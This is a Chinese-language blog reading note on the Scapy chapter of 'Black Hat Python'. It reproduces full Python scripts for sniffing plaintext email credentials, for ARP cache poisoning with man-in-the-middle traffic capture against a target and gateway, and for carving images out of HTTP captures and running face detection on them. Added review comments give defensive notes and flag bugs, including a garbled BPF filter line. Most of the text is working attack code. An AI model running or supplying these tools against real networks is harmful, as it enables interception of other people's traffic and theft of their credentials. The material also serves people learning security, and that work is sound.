读书笔记 -《Python 黑帽子》 ( 三 )
读书笔记系列文章
一直都在读书,读了忘,忘了再读。不如把每次学到的东西都写下来。第四章 Scapy: 网络的掌控者
Scapy 是十分强大的,前两章的东西用 Scapy 只要简单的几行代码就能实现。BPF、pcap 文件这些基本通用的东西,最好在阅读本章前先自己补充一下。Scapy 有一个非常强大的功能就是读取 pcap 文件,然后对其中的会话做重组。在写嗅探工具的时候,要么用 libnids 来做 TCP 的重组,要么自己写代码重组,这也是我一直在纠结的一些东西。Scapy 以一种非常简单的方式提供了这样的功能。
窃取 Email 认证
作者首先用这一章简单介绍了 scapy 的威力。email 使用的就是 SMTP、POP3、IMAP这些协议,这些协议里面使用了一些明文的关键字,通过这些关键字,可以找到用户名、密码这样的信息。
思路就是使用 scapy 来做嗅探,使用 BPF 过滤一些数据,然后在这些数据里面找关键字。
代码也是很简单易懂,其中 TCP 是 Scapy 定义的, packet 是捕获到数据后传给回调函数的参数,是一个类实例。
读代码注释就可以了,不需要更多的解释
import threading  # NOTE(review): unused in this listing
from scapy.all import *

# our packet callback
def packet_callback(packet):
    # Invoked by sniff() for each captured frame (the BPF filter below limits
    # them to TCP). Only segments carrying data are inspected; the match is a
    # case-insensitive substring test for "user" / "pass" on the raw payload,
    # so it can only ever see sessions that are not protected by TLS --
    # STARTTLS or the implicit-TLS mail ports would hide these strings from a
    # capture.
    if packet[TCP].payload:
        mail_packet = str(packet[TCP].payload)
        if "user" in mail_packet.lower() or "pass" in mail_packet.lower():
            print "[*] Server: %s" % packet[IP].dst
            print "[*] %s" % packet[TCP].payload

# fire up our sniffer
# NOTE(review): the filter string is garbled in this listing -- the word
# between "tcp " and " 25" is missing, so as printed it is not a valid BPF
# expression; check it against the original before running.
# store=0 tells sniff() not to keep the captured packets in memory.
sniff(filter="tcp port 110 or tcp " "" "" " 25 or tcp port 143", prn=packet_callback, store=0)
利用 Scapy 进行 ARP 缓存投毒
作者说『ARP 投毒是黑客工具箱中最古老最有效的攻击方式之一』。原理也是很简单,通过发送 ARP 报文欺骗目标机,使目标机以为拥有网关 IP 地址的 MAC 地址是黑客所使用机器的 MAC 地址。这样目标机会把所有流量发给黑客而不是网关。黑客开启 IP 转发功能,把目标机发送过来的数据转发给网关,这样在不影响目标机上网的情况下,拿到了目标机发出的所有流量,通过嗅探可以分析这些流量中的内容。本节的内容就是写一个 ARP 欺骗的工具。
from scapy.all import *
import os  # NOTE(review): unused in this listing
import sys
import threading
# NOTE(review): `time` is used below but never imported explicitly; this only
# works if the wildcard import above happens to re-export it -- confirm, or
# add `import time`.

# Lab configuration: interface to operate on, the two hosts whose ARP caches
# are rewritten, and how many packets to capture before stopping.
interface = "en1"
target_ip = "172.16.1.71"
gateway_ip = "172.16.1.254"
packet_count = 1000
poisoning = True  # cleared by the main thread to stop poison_target()

def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
    # Put the correct IP->MAC bindings back: broadcast ARP replies (op=2)
    # that carry the real gateway and target MACs, five times each.
    # slightly different method using send
    print "[*] Restoring target..."
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)

def get_mac(ip_address):
    # Resolve ip_address with a broadcast ARP request (2 s timeout, up to 10
    # retries) and return the source MAC of the first reply, or None.
    responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
    # return the MAC address from a response
    for s,r in responses:
        return r[Ether].src
    return None

def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
    # Runs in its own thread until the global `poisoning` flag is cleared.
    # Defensive note: both packets are unsolicited ARP replies whose sender
    # IP belongs to another host while hwsrc is left at scapy's default
    # (presumably this machine's interface MAC -- confirm); that IP/MAC
    # mismatch is exactly what ARP monitoring (e.g. arpwatch) and switch
    # Dynamic ARP Inspection flag, and static ARP entries or DAI stop the
    # cache from being overwritten in the first place.
    global poisoning
    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst= target_mac
    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst= gateway_mac
    print "[*] Beginning the ARP poison. [CTRL-C to stop]"
    while poisoning:
        send(poison_target)
        send(poison_gateway)
        time.sleep(2)
    print "[*] ARP poison attack finished."
    return

# set our interface
conf.iface = interface
# turn off output
conf.verb = 0
print "[*] Setting up %s" % interface
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
    print "[!!!] Failed to get gateway MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
    print "[!!!] Failed to get target MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Target %s is at %s" % (target_ip,target_mac)
# start poison thread
poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac,target_ip,target_mac))
poison_thread.start()
try:
    print "[*] Starting sniffer for %d packets" % packet_count
    bpf_filter = "ip host %s" % target_ip
    packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)
except KeyboardInterrupt:
    pass
finally:
    # write out the captured packets
    # NOTE(review): if sniff() raises before `packets` is assigned, wrpcap()
    # fails with NameError here and restore_target() below never runs, so the
    # hosts' ARP caches are left in the poisoned state.
    print "[*] Writing packets to arper.pcap"
    wrpcap('arper.pcap',packets)
    poisoning = False
    # wait for poisoning thread to exit
    time.sleep(2)
    # restore the network
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
    sys.exit(0)
处理 PCAP 文件
这一节的内容我感觉是比较多,不太那么纯粹了,竟然利用 opencv 来做人脸识别。这一节代码的功能是提取 pcap 文件中的 tcp 会话,从中找到 http 数据,再找到图片数据,把图片存入本地,然后使用 opencv 识别这些图片,查看这些图片是不是人脸。
这一节我最欣赏的是 Scapy 对会话重组功能的实现,真的是非常好用,其它的功能不是那么吸引人了。
根据我描述的功能,再去读这些代码就比较简单了。具体的实现细节涉及到了 opencv 的使用、http 协议的格式等。不了解这些知识的话,自己上网搜索补充后就能看懂了。
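import os
import re
import zlib
import cv2
from scapy.all import *

pictures_directory = "pic_carver/pictures"
faces_directory = "pic_carver/faces"
pcap_file = "bhp.pcap"

# The carved file's extension is the Content-Type subtype taken straight out
# of the capture, i.e. untrusted data; anything outside this character set is
# replaced before it becomes part of a path.
_SAFE_EXT_RE = re.compile(r"[^A-Za-z0-9+.-]")


def face_detect(path, file_name):
    """Run the Haar frontal-face cascade over the image stored at *path*.

    Writes an annotated copy (faces boxed) into ``faces_directory`` and
    returns True when at least one face is found; returns False when the
    image cannot be decoded or no face is detected.
    """
    img = cv2.imread(path)
    if img is None:
        # imread returns None for unreadable/undecodable files instead of
        # raising; without this guard detectMultiScale fails on None
        return False
    cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
    rects = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20, 20))
    if len(rects) == 0:
        return False
    # detectMultiScale returns (x, y, w, h); turn it into (x1, y1, x2, y2)
    rects[:, 2:] += rects[:, :2]
    # highlight the faces in the image
    for x1, y1, x2, y2 in rects:
        cv2.rectangle(img, (x1, y1), (x2, y2), (127, 255, 0), 2)
    cv2.imwrite("%s/%s-%s" % (faces_directory, pcap_file, file_name), img)
    return True


def get_http_headers(http_payload):
    """Parse the header block of the HTTP message held in *http_payload*.

    Returns a dict mapping header name to value, or None when the payload
    has no header terminator (not HTTP) or carries no Content-Type header.
    """
    try:
        # split the headers off if it is HTTP traffic; keep the trailing
        # "\r\n" so the regex below also matches the last header line
        headers_raw = http_payload[:http_payload.index("\r\n\r\n") + 2]
    except ValueError:
        # str.index raises ValueError when there is no blank line
        return None
    # break out the headers
    headers = dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", headers_raw))
    if "Content-Type" not in headers:
        return None
    return headers


def extract_image(headers, http_payload):
    """Return ``(image_bytes, image_type)`` for an image response.

    *headers* is the dict produced by get_http_headers(). The body is taken
    from the first blank line of *http_payload* onward and inflated when the
    response declares a gzip or deflate Content-Encoding. Returns
    ``(None, None)`` when the response is not an image or is malformed.
    """
    image = None
    image_type = None
    try:
        content_type = headers['Content-Type']
        if "image" in content_type:
            # grab the image type and image body; drop any ";charset=..."
            # parameter so it does not end up in the file extension
            image_type = content_type.split(";")[0].split("/")[1].strip()
            image = http_payload[http_payload.index("\r\n\r\n") + 4:]
            # if we detect compression decompress the image
            encoding = headers.get('Content-Encoding')
            try:
                if encoding == "gzip":
                    image = zlib.decompress(image, 16 + zlib.MAX_WBITS)
                elif encoding == "deflate":
                    image = zlib.decompress(image)
            except zlib.error:
                # truncated or mislabeled body: keep the raw bytes, as before
                pass
    except (KeyError, IndexError, ValueError):
        # missing header, no "/" in the type, or no header terminator
        return None, None
    return image, image_type


def http_assembler(pcap_file):
    """Carve HTTP image bodies out of *pcap_file* and run face detection.

    Each TCP session from scapy's sessions() is reassembled by concatenating
    payloads in packet order -- there is no sequence-number handling, so
    retransmissions or reordering corrupt the buffer. Returns the tuple
    ``(carved_images, faces_detected)``.
    """
    carved_images = 0
    faces_detected = 0
    # both output directories must exist before the first write
    for directory in (pictures_directory, faces_directory):
        if not os.path.isdir(directory):
            os.makedirs(directory)
    a = rdpcap(pcap_file)
    sessions = a.sessions()
    for session in sessions:
        payload_parts = []
        for packet in sessions[session]:
            try:
                if packet[TCP].dport == 80 or packet[TCP].sport == 80:
                    # reassemble the stream into a single buffer
                    payload_parts.append(str(packet[TCP].payload))
            except IndexError:
                # scapy raises IndexError for packets without a TCP layer
                pass
        http_payload = "".join(payload_parts)
        headers = get_http_headers(http_payload)
        if headers is None:
            continue
        image, image_type = extract_image(headers, http_payload)
        if image is None or image_type is None:
            continue
        # store the image; the extension is sanitized because it came from
        # the capture, and only the pcap's basename is used so a pcap given
        # with a directory part does not produce a nested path
        safe_type = _SAFE_EXT_RE.sub("_", image_type)
        file_name = "%s-pic_carver_%d.%s" % (os.path.basename(pcap_file), carved_images, safe_type)
        image_path = os.path.join(pictures_directory, file_name)
        with open(image_path, "wb") as fd:
            fd.write(image)
        carved_images += 1
        # now attempt face detection; it is best-effort, so a bad cascade
        # file or an OpenCV failure must not abort the carve
        try:
            if face_detect(image_path, file_name) is True:
                faces_detected += 1
        except Exception:
            pass
    return carved_images, faces_detected


carved_images, faces_detected = http_assembler(pcap_file)
# parenthesised so the calls work under both Python 2 and Python 3
print("Extracted: %d images" % carved_images)
print("Detected: %d faces" % faces_detected)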